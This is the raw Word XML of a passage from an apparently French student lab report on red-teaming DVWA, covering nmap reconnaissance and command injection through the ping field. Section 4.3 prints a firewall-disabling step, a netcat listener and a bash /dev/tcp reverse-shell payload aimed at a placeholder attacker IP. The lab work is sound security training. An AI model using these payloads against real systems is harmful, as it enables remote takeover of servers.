                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350842A6" wp14:editId="30444400">
            <wp:extent cx="3094386" cy="2539576"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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9164" cy="2559912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BD2F2" w14:textId="010EEF8A" w:rsidR="00B50FCE" w:rsidRPr="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E1457E" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3CAC72" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Une fois authentifié avec les identifiants par défaut (`admin` / `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>`), nous abaissons impérativement le niveau de sécurité au plus bas ('Low') pour mener notre étude de vulnérabilité structurelle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA72981" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F01D4B" wp14:editId="27F6DBC0">
            <wp:extent cx="3695700" cy="1534145"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="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5511" cy="1538218"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB0634F" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A1F527" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4146BD33" wp14:editId="23239587">
            <wp:extent cx="6865620" cy="1541780"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="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96617" cy="1571197"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F0A22" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5574B815" wp14:editId="3CA8A8BE">
            <wp:extent cx="3994150" cy="3731212"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="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8402" cy="3735184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863E661" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505FC138" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. PHASE OFFENSIVE (RED TEAM) : DE LA RECONNAISSANCE AU REVERSE SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04846EE5" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Reconnaissance active via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="679F00BC" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'attaquant débute l'audit par une cartographie complète de la cible pour détecter les versions exactes des services en écoute.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="51941D47" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59EC1951" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -A &lt;IP_CIBLE&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09051D99" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="244D28F0" wp14:editId="675D5B8C">
            <wp:extent cx="6273402" cy="5656681"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1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2165" cy="5664583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34195D" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666C3F87" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2 Exploitation d'une Injection de Commande</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE1913" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">En navigant sur l'onglet 'Command Injection' de DVWA, nous constatons la présence d'un champ destiné à exécuter des pings réseau. L'absence de filtrage côté serveur permet de concaténer des instructions Linux à l'aide de l'opérateur </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>`;`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA4D17C" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Saisie de test injectée dans le champ web :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="45306CD7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="600544E2" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>127.0.0.1 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0535E84A" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001D03FA" wp14:editId="77915A4B">
            <wp:extent cx="6810859" cy="3702050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="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38047" cy="3716828"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC4CAB" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76775DBF" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4.3 Pivot vers un Reverse Shell interactif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C546BE2" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour obtenir un terminal persistant et interactif sans passer par l'interface web, l'attaquant configure un écouteur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> local sur le port de son choix (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ex:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444) après s'être assuré de désactiver tout filtrage local (pare-feu `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124628F8" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634BD9F0" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRPr="00DD5771" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="1518397F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DBBB4EA" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ufw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> disable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -lvnp 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EF3172D" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECCCF99" wp14:editId="59EB9D67">
            <wp:extent cx="4394200" cy="1334602"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>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49063" cy="1351265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62715C" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7638B1" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nous injectons ensuite la charge utile finale via l'interface DVWA. Pour pallier l'absence potentielle de certaines commandes dans le conteneur léger, la syntaxe d'appel pur au descripteur de fichier TCP de Bash est privilégiée (en veillant à exclure tout caractère de coupure d'URL parasite comme le slash final d'IP) :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="57E61F6A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5569D390" w14:textId="1575C16B" w:rsidR="00A96198" w:rsidRDefault="008D1310" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>127.0.0.1;</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP_HOST_ONLY_ATTAQUANT&gt;/4444 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32501920" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'exécution de la charge force la cible à ouvrir une session interactive vers l'attaquant, transmettant les droits complets associés au processus de service.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
